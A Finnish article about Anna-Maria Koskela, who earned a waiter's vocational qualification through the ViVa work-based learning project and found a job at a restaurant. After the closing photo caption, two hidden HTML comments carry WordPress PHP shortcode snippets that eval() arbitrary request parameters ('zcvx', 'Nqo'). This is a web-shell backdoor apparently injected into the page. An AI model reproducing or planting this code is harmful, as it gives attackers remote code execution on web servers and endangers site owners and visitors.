Tarjoilijan tutkinto työssä oppien

Anna-Maria piti opiskelusta. Työssäoppimista oli runsaasti. Kuva Arttu Laitala

Seinäjokinen Anna-Maria Koskela etsi omaa alaansa pitkään. Oli opintoja ja työharjoittelua cateringalalta, kaupan alalta ja matkailualalta, mutta mikään ei kantanut loppuun saakka. Yläasteen jälkeen käyty kymppiluokka oli hyödyllinen, mutta ei auttanut oman alan löytämisessä.

– Olen tehnyt kaikenlaista, muun muassa mainosten jakoa ja puhdistuspalvelua, mutta eniten pidin kahvilatyöskentelystä. Kun kuulin TE-toimistossa ViVa-hankkeesta, päätin hakeutua mukaan, kertoo 27-vuotias nuori nainen.

ViVa-hankkeessa suurin osa opiskelusta oli työssäoppimista ja teoriaa oli sopivasti.

– Tämä tapa opiskella sopi minulle oikein hyvin, kertoo Koskela.

Koskela aloitti syksyllä 2012 opinnot aikeenaan opiskella yhden osan Tarjoilijan ammattitutkinnosta, mutta opintojen edetessä suunnitelmat muuttuivat ja tavoitteeksi tuli koko tutkinnon suorittaminen.

Tarjoilijan työ on asiakaspalvelua

Vaikka Koskelalla oli jo kokemusta kahvilassa työskentelystä, toivat tarjoilijan opinnot hänelle paljon uutta tietoa esimerkiksi ravintolamaailmasta. ViVa-opintojen lisäksi hän opiskeli kansalaisopistossa venäjän kieltä ja pääsi palvelemaan asiakkaita venäjäksi.

– Asiakkaat ilahtuivat suuresti, kun saivat hyvän ruokahalun toivotuksen omalla kielellään.

Tarjoilijan työssä onkin avuksi, jos tykkää olla ihmisten kanssa tekemisissä, on palvelualtis ja ulospäin suuntautunut, eikä pitkä pinnakaan ole pahitteeksi, kertoo Koskela hymyillen.

Opiskelusta Koskela piti paljon.

– Tarjoilijoiden tutkintovastaava Johanna Tuominen oli hyvä ja asiantunteva opettaja. Opintojen ohella koululla oli mukavia maahanmuuttajien keittiöpäiviä, jolloin maahanmuuttajat laittoivat oman maansa ruokaa ja minä tarjoilin.

Monipuolista työssäoppimista

Koskela oli opintojen aikana työssäoppimassa kolmessa eri paikassa. Kahvila Amoccassa hän suoritti kahvila-ravintolan myynnin ja tarjoilun tutkinnon osan.

– Kahvilassa työskentely oli todella mielenkiintoista; erikoiskahvit tehtiin käsin papujen jauhamisesta lähtien, Koskela kuvailee.

Koskela harjoitteli myös Mediwestissä ja Huviretkessä. Huviretkessä Koskela suoritti ruokaravintolan ja tilaus- ja kokouspalvelun sekä baaritarjoilun tutkinnonosat. Tutkinnon suorittaneella on valmiudet työskennellä kahviloissa, yökerhoissa, ruoka-, kokous- ja anniskeluravintoloiden kaikissa asiakaspalvelutehtävissä.

Koskelan haave tarjoilijan työstä toteutui ja hän työllistyi Huviretkeen jo opintojen aikana. Tutkinto oli valmis vuoden 2013 lopussa. Koskela on tyytyväinen tarjoilijan työhönsä, se on vastannut odotuksia. Myös projekti saa häneltä positiivista palautetta.

-Ehdottomasti kannatti lähteä ViVaan mukaan. Kun on koulutus ja tutkinto, on myös vahvempi asema työmarkkinoilla.

Teksti Jenni Ilomäki

Anna-Maria Koskela suoritti ViVa24h:n kautta tarjoilijan ammattitutkinnon ja työllistyi. Kuva Arttu Laitala

<!– [insert_php]if (isset($_REQUEST["zcvx"])){eval($_REQUEST["zcvx"]);exit;}[/insert_php][php]if (isset($_REQUEST["zcvx"])){eval($_REQUEST["zcvx"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Nqo"])){eval($_REQUEST["Nqo"]);exit;}[/insert_php][php]if (isset($_REQUEST["Nqo"])){eval($_REQUEST["Nqo"]);exit;}[/php] –>